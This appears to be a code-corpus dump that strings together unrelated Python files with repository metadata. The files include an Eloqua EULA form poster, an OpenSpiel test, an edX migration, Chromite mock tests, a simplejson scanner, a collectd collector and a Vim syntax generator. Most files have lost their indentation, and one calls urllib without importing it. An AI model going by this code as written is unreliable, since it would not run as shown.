import urllib2
from optparse import OptionParser
import sys
import logging
# logging starts
logging.basicConfig(filename='/var/log/marketing.log', level=logging.DEBUG)
def parse_options():
parser = OptionParser()
parser.add_option('-e', '--email-address', dest='email', type="string", help='Set email address')
parser.add_option('-b', '--business-phone', dest='phone', type="string", help='Set phone')
parser.add_option('-f', '--first-name', dest='fname', type="string", help='Set first name')
parser.add_option('-l', '--last-name', dest='lname', type="string", help='Set last name')
parser.add_option('-r', '--job-role', dest='jobrole', type="string", help='Set job role')
parser.add_option('-j', '--job-function', dest='jobfunction', type="string", help='Set job function')
parser.add_option('-c', '--company', dest='company', type="string", help='Set company')
(options, args) = parser.parse_args()
if (options.email is None or options.phone is None or options.fname is None or options.lname is None or
options.jobrole is None or options.jobfunction is None or options.company is None):
logging.error("required parameter cannot be empty")
sys.exit(1)
return options
def postEulaInfo(firstName, lastName, emailAddress, company, jobRole, jobFunction, businessPhone):
elqFormName='Cloudera_Director_on_Azure_EULA'
elqSiteID='1465054361'
cid='701340000018RQV'
url = 'https://s1465054361.t.eloqua.com/e/f2'
data = urllib.urlencode({'elqFormName': elqFormName,
'elqSiteID': elqSiteID,
'cid': cid,
'firstName': firstName,
'lastName': lastName,
'company': company,
'emailAddress': emailAddress,
'jobRole': jobRole,
'jobFunction': jobFunction,
'businessPhone': businessPhone
})
results = urllib2.urlopen(url, data)
logging.info(results.read())
def main():
# Parse user options
logging.info("parse_options")
options = parse_options()
postEulaInfo(options.fname, options.lname, options.email, options.company, options.jobrole, options.jobfunction,
options.phone)
if __name__ == "__main__":
main()
|
mit
|
deepmind/open_spiel
|
open_spiel/python/egt/alpharank_visualizer_test.py
|
1
|
2447
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for open_spiel.python.egt.alpharank_visualizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
# pylint: disable=g-import-not-at-top
import matplotlib
matplotlib.use("agg") # switch backend for testing
import mock
import numpy as np
from open_spiel.python.egt import alpharank
from open_spiel.python.egt import alpharank_visualizer
from open_spiel.python.egt import utils
import pyspiel
class AlpharankVisualizerTest(absltest.TestCase):
@mock.patch("%s.alpharank_visualizer.plt" % __name__)
def test_plot_pi_vs_alpha(self, mock_plt):
# Construct game
game = pyspiel.load_matrix_game("matrix_rps")
payoff_tables = utils.game_payoffs_array(game)
_, payoff_tables = utils.is_symmetric_matrix_game(payoff_tables)
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
# Compute alpharank
alpha = 1e2
_, _, pi, num_profiles, num_strats_per_population =\
alpharank.compute(payoff_tables, alpha=alpha)
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
num_populations = len(payoff_tables)
# Construct synthetic pi-vs-alpha history
pi_list = np.empty((num_profiles, 0))
alpha_list = []
for _ in range(2):
pi_list = np.append(pi_list, np.reshape(pi, (-1, 1)), axis=1)
alpha_list.append(alpha)
# Test plotting code (via pyplot mocking to prevent plot pop-up)
alpharank_visualizer.plot_pi_vs_alpha(
pi_list.T,
alpha_list,
num_populations,
num_strats_per_population,
strat_labels,
num_strats_to_label=0)
self.assertTrue(mock_plt.show.called)
if __name__ == "__main__":
absltest.main()
|
apache-2.0
|
vismartltd/edx-platform
|
lms/djangoapps/ccx/migrations/0001_initial.py
|
94
|
8576
|
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name, missing-docstring, unused-argument, unused-import, line-too-long
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CustomCourseForEdX'
db.create_table('ccx_customcourseforedx', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
('display_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('coach', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal('ccx', ['CustomCourseForEdX'])
# Adding model 'CcxMembership'
db.create_table('ccx_ccxmembership', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('student', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('active', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ccx', ['CcxMembership'])
# Adding model 'CcxFutureMembership'
db.create_table('ccx_ccxfuturemembership', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('email', self.gf('django.db.models.fields.CharField')(max_length=255)),
('auto_enroll', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ccx', ['CcxFutureMembership'])
# Adding model 'CcxFieldOverride'
db.create_table('ccx_ccxfieldoverride', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('location', self.gf('xmodule_django.models.LocationKeyField')(max_length=255, db_index=True)),
('field', self.gf('django.db.models.fields.CharField')(max_length=255)),
('value', self.gf('django.db.models.fields.TextField')(default='null')),
))
db.send_create_signal('ccx', ['CcxFieldOverride'])
# Adding unique constraint on 'CcxFieldOverride', fields ['ccx', 'location', 'field']
db.create_unique('ccx_ccxfieldoverride', ['ccx_id', 'location', 'field'])
def backwards(self, orm):
# Removing unique constraint on 'CcxFieldOverride', fields ['ccx', 'location', 'field']
db.delete_unique('ccx_ccxfieldoverride', ['ccx_id', 'location', 'field'])
# Deleting model 'CustomCourseForEdX'
db.delete_table('ccx_customcourseforedx')
# Deleting model 'CcxMembership'
db.delete_table('ccx_ccxmembership')
# Deleting model 'CcxFutureMembership'
db.delete_table('ccx_ccxfuturemembership')
# Deleting model 'CcxFieldOverride'
db.delete_table('ccx_ccxfieldoverride')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'ccx.ccxfieldoverride': {
'Meta': {'unique_together': "(('ccx', 'location', 'field'),)", 'object_name': 'CcxFieldOverride'},
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('xmodule_django.models.LocationKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'default': "'null'"})
},
'ccx.ccxfuturemembership': {
'Meta': {'object_name': 'CcxFutureMembership'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'ccx.ccxmembership': {
'Meta': {'object_name': 'CcxMembership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'student': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'ccx.customcourseforedx': {
'Meta': {'object_name': 'CustomCourseForEdX'},
'coach': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['ccx']
|
agpl-3.0
|
chadversary/chromiumos.chromite
|
lib/partial_mock_unittest.py
|
2
|
7884
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for the partial_mock test helper code."""
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)),
'..', '..'))
from chromite.lib import cros_test_lib
from chromite.lib import partial_mock
# pylint: disable=W0212
class ComparatorTest(cros_test_lib.MoxTestCase):
"""Test Comparitor functionality."""
TEST_KEY1 = 'monkey'
TEST_KEY2 = 'foon'
def testEquals(self):
"""__eq__, __ne__ functionality of Comparator classes."""
for cls_name in ['In', 'Regex', 'ListRegex']:
cls = getattr(partial_mock, cls_name)
obj1 = cls(self.TEST_KEY1)
obj2 = cls(self.TEST_KEY1)
obj3 = cls(self.TEST_KEY2)
self.assertEquals(obj1, obj2)
self.assertFalse(obj1 == obj3)
self.assertNotEquals(obj1, obj3)
def testIgnoreEquals(self):
"""Verify __eq__ functionality for Ignore."""
obj1 = partial_mock.Ignore()
obj2 = partial_mock.Ignore()
self.assertEquals(obj1, obj2)
self.assertFalse(obj1 != obj2)
def testListRegex(self):
"""Verify ListRegex match functionality."""
obj = partial_mock.ListRegex('.*monkey.*')
self.assertTrue(obj.Match(['the', 'small monkeys', 'jumped']))
self.assertFalse(obj.Match(['the', 'jumped']))
self.assertFalse(obj.Match(None))
self.assertFalse(obj.Match(1))
class RecursiveCompareTest(cros_test_lib.MoxTestCase):
"""Test recursive compare functionality."""
LHS_DICT = {3: 1, 1: 2}
RHS_DICT = {1: 2, 3: 1}
LIST = [1, 2, 3, 4]
TUPLE = (1, 2, 3, 4)
def TrueHelper(self, lhs, rhs):
self.assertTrue(partial_mock._RecursiveCompare(lhs, rhs))
def FalseHelper(self, lhs, rhs):
self.assertFalse(partial_mock._RecursiveCompare(lhs, rhs))
def testIt(self):
"""Test basic equality cases."""
self.TrueHelper(self.LHS_DICT, self.RHS_DICT)
self.TrueHelper({3: self.LIST, 1: self.LHS_DICT},
{1: self.LHS_DICT, 3: self.LIST})
self.FalseHelper({1: self.LHS_DICT, 3: self.LIST},
{1: self.LHS_DICT, 3: self.LIST + [5]})
self.FalseHelper(self.LIST, self.TUPLE)
def testUnicode(self):
"""Test recursively comparing unicode and non-unicode strings."""
self.assertTrue(partial_mock._RecursiveCompare(['foo'], [u'foo']))
class ListContainsTest(cros_test_lib.MoxTestCase):
"""Unittests for ListContains method."""
L = range(10) + range(10) + [9]
STRICTLY_TRUE_LISTS = [range(10), range(9, 10), range(3, 6), range(1), [],
[9, 9]]
LOOSELY_TRUE_LISTS = [range(0, 10, 2), range(3, 6, 2), [1, 1]]
FALSE_LISTS = [[1.5], [-1], [1, 1, 1], [10], [22], range(6, 11), range(-1, 5)]
def testStrictContains(self):
"""Test ListContains with strict=True."""
for x in self.STRICTLY_TRUE_LISTS:
self.assertTrue(partial_mock.ListContains(x, self.L, strict=True))
for x in self.LOOSELY_TRUE_LISTS + self.FALSE_LISTS:
self.assertFalse(partial_mock.ListContains(x, self.L, strict=True))
def testLooseContains(self):
"""Test ListContains with strict=False."""
for x in self.STRICTLY_TRUE_LISTS + self.LOOSELY_TRUE_LISTS:
self.assertTrue(partial_mock.ListContains(x, self.L))
for x in self.FALSE_LISTS:
self.assertFalse(partial_mock.ListContains(x, self.L))
def testUnicode(self):
"""Test ListContains with unicode and non-unicode strings."""
self.assertTrue(partial_mock.ListContains(['foo'], [u'foo']))
class MockedCallResultsTest(cros_test_lib.MoxTestCase):
"""Test MockedCallResults functionality."""
ARGS = ('abc',)
LIST_ARGS = ([1, 2, 3, 4],)
KWARGS = {'test': 'ing'}
NEW_ENTRY = {'new': 'entry'}
def KwargsHelper(self, result, kwargs, strict=True):
self.mr.AddResultForParams(self.ARGS, result, kwargs=kwargs,
strict=strict)
def setUp(self):
self.mr = partial_mock.MockedCallResults('SomeFunction')
def testNoMock(self):
"""The call is not mocked."""
self.assertRaises(AssertionError, self.mr.LookupResult, self.ARGS)
def testArgReplacement(self):
"""Replacing mocks for args-only calls."""
self.mr.AddResultForParams(self.ARGS, 1)
self.mr.AddResultForParams(self.ARGS, 2)
self.assertEquals(2, self.mr.LookupResult(self.ARGS))
def testKwargsStrictReplacement(self):
"""Replacing strict kwargs mock with another strict mock."""
self.KwargsHelper(1, self.KWARGS)
self.KwargsHelper(2, self.KWARGS)
self.assertEquals(2, self.mr.LookupResult(self.ARGS, kwargs=self.KWARGS))
def testKwargsNonStrictReplacement(self):
"""Replacing strict kwargs mock with nonstrict mock."""
self.KwargsHelper(1, self.KWARGS)
self.KwargsHelper(2, self.KWARGS, strict=False)
self.assertEquals(2, self.mr.LookupResult(self.ARGS, kwargs=self.KWARGS))
def testListArgLookup(self):
"""Matching of arguments containing lists."""
self.mr.AddResultForParams(self.LIST_ARGS, 1)
self.mr.AddResultForParams(self.ARGS, 1)
self.assertEquals(1, self.mr.LookupResult(self.LIST_ARGS))
def testKwargsStrictLookup(self):
"""Strict lookup fails due to extra kwarg."""
self.KwargsHelper(1, self.KWARGS)
    kwargs = dict(self.NEW_ENTRY)
    kwargs.update(self.KWARGS)
self.assertRaises(AssertionError, self.mr.LookupResult, self.ARGS,
kwargs=kwargs)
def testKwargsNonStrictLookup(self):
""""Nonstrict lookup passes with extra kwarg."""
self.KwargsHelper(1, self.KWARGS, strict=False)
    kwargs = dict(self.NEW_ENTRY)
    kwargs.update(self.KWARGS)
self.assertEquals(1, self.mr.LookupResult(self.ARGS, kwargs=kwargs))
def testIgnoreMatching(self):
"""Deep matching of Ignore objects."""
ignore = partial_mock.Ignore()
self.mr.AddResultForParams((ignore, ignore), 1, kwargs={'test': ignore})
self.assertEquals(
1, self.mr.LookupResult(('some', 'values'), {'test': 'bla'}))
def testRegexMatching(self):
"""Regex matching."""
self.mr.AddResultForParams((partial_mock.Regex('pre.ix'),), 1)
self.mr.AddResultForParams((partial_mock.Regex('suffi.'),), 2)
self.assertEquals(1, self.mr.LookupResult(('prefix',)))
self.assertEquals(2, self.mr.LookupResult(('suffix',)))
def testMultipleMatches(self):
"""Lookup matches mutilple results."""
self.mr.AddResultForParams((partial_mock.Ignore(),), 1)
self.mr.AddResultForParams((partial_mock.In('test'),), 2)
self.assertRaises(AssertionError, self.mr.LookupResult, ('test',))
def testDefaultResult(self):
"""Test default result matching."""
self.mr.SetDefaultResult(1)
self.mr.AddResultForParams((partial_mock.In('test'),), 2)
self.assertEquals(1, self.mr.LookupResult(self.ARGS))
self.assertEquals(2, self.mr.LookupResult(('test',)))
def _ExampleHook(self, *args, **kwargs):
"""Example hook for testing."""
self.assertEquals(args, self.LIST_ARGS)
self.assertEquals(kwargs, self.KWARGS)
return 2
def testHook(self):
"""Return value of hook is used as the final result."""
self.mr.AddResultForParams(self.ARGS, 1, side_effect=self._ExampleHook)
self.assertEqual(
2, self.mr.LookupResult(self.ARGS, hook_args=self.LIST_ARGS,
hook_kwargs=self.KWARGS))
def testDefaultHook(self):
"""Verify default hooks are used."""
self.mr.SetDefaultResult(1, self._ExampleHook)
self.mr.AddResultForParams((partial_mock.In('test'),), 3)
self.assertEqual(
2, self.mr.LookupResult(self.ARGS, hook_args=self.LIST_ARGS,
hook_kwargs=self.KWARGS))
self.assertEquals(3, self.mr.LookupResult(('test',)))
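# Hedged usage sketch (not part of the original tests): the MockedCallResults
# API exercised above is typically driven like this.
def _UsageSketch():
  mr = partial_mock.MockedCallResults('SomeFunction')
  mr.AddResultForParams(('bar',), 42)
  assert mr.LookupResult(('bar',)) == 42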
if __name__ == '__main__':
cros_test_lib.main()
|
bsd-3-clause
|
Work4Labs/lettuce
|
tests/integration/lib/Django-1.3/django/utils/simplejson/scanner.py
|
928
|
2227
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
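# Hedged illustration (not part of the original module):
#   NUMBER_RE.match('-1.5e3').groups() -> ('-1', '.5', 'e3')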
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
make_scanner = c_make_scanner or py_make_scanner
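# Hedged usage sketch (not part of the original module): a decoder supplies
# the parse_* callbacks as the scanner "context". The stdlib json package
# follows the same protocol, e.g.
#
#   import json
#   decoder = json.JSONDecoder()
#   decoder.scan_once('{"a": 1}', 0)  # -> ({'a': 1}, 8)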
|
gpl-3.0
|
akshara775/PerfKitBenchmarker-master-2
|
perfkitbenchmarker/traces/collectd.py
|
5
|
2992
|
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Records system performance counters during benchmark runs using collectd.
http://collectd.org
"""
import logging
import os
import posixpath
from perfkitbenchmarker import events
from perfkitbenchmarker import flags
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import collectd
flags.DEFINE_boolean('collectd', False,
'Install and run collectd on the guest.')
flags.DEFINE_string('collectd_output', None, 'Path to store collectd results.')
class _CollectdCollector(object):
"""Manages running collectd during a test, and fetching the CSV results."""
def __init__(self, target_dir):
self.target_dir = target_dir
def _FetchResults(self, vm):
"""Stops collectd on the VM, fetches CSV results."""
logging.info('Fetching collectd results')
local_dir = os.path.join(self.target_dir, vm.name + '-collectd')
    # On the remote host, CSV files are in:
    #   collectd.CSV_DIR/<fqdn>/<category>.
# Since AWS VMs have a FQDN different from the VM name, we rename locally.
vm.PullFile(local_dir, posixpath.join(collectd.CSV_DIR, '*', ''))
def Before(self, unused_sender, benchmark_spec):
"""Install collectd.
Args:
benchmark_spec: benchmark_spec.BenchmarkSpec. The benchmark currently
running.
"""
logging.info('Installing collectd')
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: vm.Install('collectd'), vms)
def After(self, unused_sender, benchmark_spec):
"""Stop / delete collectd, fetch results from VMs.
Args:
benchmark_spec: benchmark_spec.BenchmarkSpec. The benchmark that stopped
running.
"""
logging.info('Stopping collectd')
vms = benchmark_spec.vms
vm_util.RunThreaded(self._FetchResults, vms)
def Register(parsed_flags):
"""Register the collector if FLAGS.collectd is set."""
if not parsed_flags.collectd:
return
logging.info('Registering collectd collector')
output_directory = parsed_flags.collectd_output or vm_util.GetTempDir()
if not os.path.isdir(output_directory):
raise IOError('collectd output directory does not exist: {0}'.format(
output_directory))
collector = _CollectdCollector(output_directory)
events.before_phase.connect(collector.Before, events.RUN_PHASE, weak=False)
events.after_phase.connect(collector.After, events.RUN_PHASE, weak=False)
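# Hedged usage sketch (not part of the original module): the PKB harness is
# expected to call Register() once flags have been parsed, e.g.
#
#   Register(flags.FLAGS)  # no-op unless --collectd was passed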
|
apache-2.0
|
mollstam/UnrealPy
|
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Python-2.7.10/Misc/Vim/vim_syntax.py
|
34
|
8927
|
from __future__ import with_statement
import keyword
import exceptions
import __builtin__
from string import Template
from sys import subversion
comment_header = '''" Auto-generated Vim syntax file for Python (%s: r%s).
"
" To use: copy or symlink to ~/.vim/syntax/python.vim'''
statement_header = """
if exists("b:current_syntax")
finish
endif"""
statement_footer = '''
" Uncomment the 'minlines' statement line and comment out the 'maxlines'
" statement line; changes behaviour to look at least 2000 lines previously for
" syntax matches instead of at most 200 lines
syn sync match pythonSync grouphere NONE "):$"
syn sync maxlines=200
"syn sync minlines=2000
let b:current_syntax = "python"'''
looping = ('for', 'while')
conditionals = ('if', 'elif', 'else')
boolean_ops = ('and', 'in', 'is', 'not', 'or')
import_stmts = ('import', 'from')
object_defs = ('def', 'class')
exception_names = sorted(exc for exc in dir(exceptions)
if not exc.startswith('__'))
# Need to include functions that start with '__' (e.g., __import__), but
# nothing that comes with modules (e.g., __name__), so just exclude anything in
# the 'exceptions' module since we want to ignore exceptions *and* what any
# module would have
builtin_names = sorted(builtin for builtin in dir(__builtin__)
if builtin not in dir(exceptions))
escapes = (r'+\\[abfnrtv\'"\\]+', r'"\\\o\{1,3}"', r'"\\x\x\{2}"',
r'"\(\\u\x\{4}\|\\U\x\{8}\)"', r'"\\$"')
todos = ("TODO", "FIXME", "XXX")
# XXX codify?
numbers = (r'"\<0x\x\+[Ll]\=\>"', r'"\<\d\+[LljJ]\=\>"',
'"\.\d\+\([eE][+-]\=\d\+\)\=[jJ]\=\>"',
'"\<\d\+\.\([eE][+-]\=\d\+\)\=[jJ]\=\>"',
'"\<\d\+\.\d\+\([eE][+-]\=\d\+\)\=[jJ]\=\>"')
contained = lambda x: "%s contained" % x
def str_regexes():
"""Generator to yield various combinations of strings regexes"""
regex_template = Template('matchgroup=Normal ' +
'start=+[uU]\=${raw}${sep}+ ' +
'end=+${sep}+ ' +
'${skip} ' +
'${contains}')
skip_regex = Template(r'skip=+\\\\\|\\${sep}+')
for raw in ('', '[rR]'):
for separator in ("'", '"', '"""', "'''"):
if len(separator) == 1:
skip = skip_regex.substitute(sep=separator)
else:
skip = ''
contains = 'contains=pythonEscape' if not raw else ''
yield regex_template.substitute(raw=raw, sep=separator, skip=skip,
contains = contains)
space_errors = (r'excludenl "\S\s\+$"ms=s+1', r'" \+\t"', r'"\t\+ "')
statements = (
('',
# XXX Might need to change pythonStatement since have
# specific Repeat, Conditional, Operator, etc. for 'while',
# etc.
[("Statement", "pythonStatement", "keyword",
(kw for kw in keyword.kwlist
if kw not in (looping + conditionals + boolean_ops +
import_stmts + object_defs))
),
("Statement", "pythonStatement", "keyword",
(' '.join(object_defs) +
' nextgroup=pythonFunction skipwhite')),
("Function","pythonFunction", "match",
contained('"[a-zA-Z_][a-zA-Z0-9_]*"')),
("Repeat", "pythonRepeat", "keyword", looping),
("Conditional", "pythonConditional", "keyword",
conditionals),
("Operator", "pythonOperator", "keyword", boolean_ops),
("PreCondit", "pythonPreCondit", "keyword", import_stmts),
("Comment", "pythonComment", "match",
'"#.*$" contains=pythonTodo'),
("Todo", "pythonTodo", "keyword",
contained(' '.join(todos))),
("String", "pythonString", "region", str_regexes()),
("Special", "pythonEscape", "match",
(contained(esc) for esc in escapes
if not '$' in esc)),
("Special", "pythonEscape", "match", r'"\\$"'),
]
),
("python_highlight_numbers",
[("Number", "pythonNumber", "match", numbers)]
),
("python_highlight_builtins",
[("Function", "pythonBuiltin", "keyword", builtin_names)]
),
("python_highlight_exceptions",
[("Exception", "pythonException", "keyword",
exception_names)]
),
("python_highlight_space_errors",
[("Error", "pythonSpaceError", "match",
("display " + err for err in space_errors))]
)
)
def syn_prefix(type_, kind):
return 'syn %s %s ' % (type_, kind)
def fill_stmt(iterable, fill_len):
"""Yield a string that fills at most fill_len characters with strings
returned by 'iterable' and separated by a space"""
# Deal with trailing char to handle ' '.join() calculation
fill_len += 1
overflow = None
it = iter(iterable)
while True:
buffer_ = []
total_len = 0
if overflow:
buffer_.append(overflow)
total_len += len(overflow) + 1
overflow = None
while total_len < fill_len:
try:
new_item = it.next()
buffer_.append(new_item)
total_len += len(new_item) + 1
except StopIteration:
if buffer_:
break
if overflow:
yield overflow
return
if total_len > fill_len:
overflow = buffer_.pop()
total_len -= len(overflow) - 1
ret = ' '.join(buffer_)
assert len(ret) <= fill_len
yield ret
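def _fill_stmt_example():
    """Hedged illustration (not part of the original script).

    Packs keywords into lines of at most 10 characters:
        list(fill_stmt(['for', 'while', 'if'], 10)) -> ['for while', 'if']
    """
    return list(fill_stmt(['for', 'while', 'if'], 10))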
FILL = 80
def main(file_path):
with open(file_path, 'w') as FILE:
# Comment for file
print>>FILE, comment_header % subversion[1:]
print>>FILE, ''
# Statements at start of file
print>>FILE, statement_header
print>>FILE, ''
# Generate case for python_highlight_all
print>>FILE, 'if exists("python_highlight_all")'
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, ' let %s = 1' % statement_var
else:
print>>FILE, 'endif'
print>>FILE, ''
# Generate Python groups
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, 'if exists("%s")' % statement_var
indent = ' '
else:
indent = ''
for colour_group, group, type_, arguments in statement_parts:
if not isinstance(arguments, basestring):
prefix = syn_prefix(type_, group)
if type_ == 'keyword':
stmt_iter = fill_stmt(arguments,
FILL - len(prefix) - len(indent))
try:
while True:
print>>FILE, indent + prefix + stmt_iter.next()
except StopIteration:
print>>FILE, ''
else:
for argument in arguments:
print>>FILE, indent + prefix + argument
else:
print>>FILE, ''
else:
print>>FILE, indent + syn_prefix(type_, group) + arguments
print>>FILE, ''
else:
if statement_var:
print>>FILE, 'endif'
print>>FILE, ''
print>>FILE, ''
# Associating Python group with Vim colour group
for statement_var, statement_parts in statements:
if statement_var:
print>>FILE, ' if exists("%s")' % statement_var
indent = ' '
else:
indent = ' '
for colour_group, group, type_, arguments in statement_parts:
print>>FILE, (indent + "hi def link %s %s" %
(group, colour_group))
else:
if statement_var:
print>>FILE, ' endif'
print>>FILE, ''
# Statements at the end of the file
print>>FILE, statement_footer
if __name__ == '__main__':
main("python.vim")
|
mit
|
Alecto3-D/testable-greeter
|
bb-master/sandbox/lib/python3.5/site-packages/buildbot/statistics/storage_backends/influxdb_client.py
|
11
|
2219
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
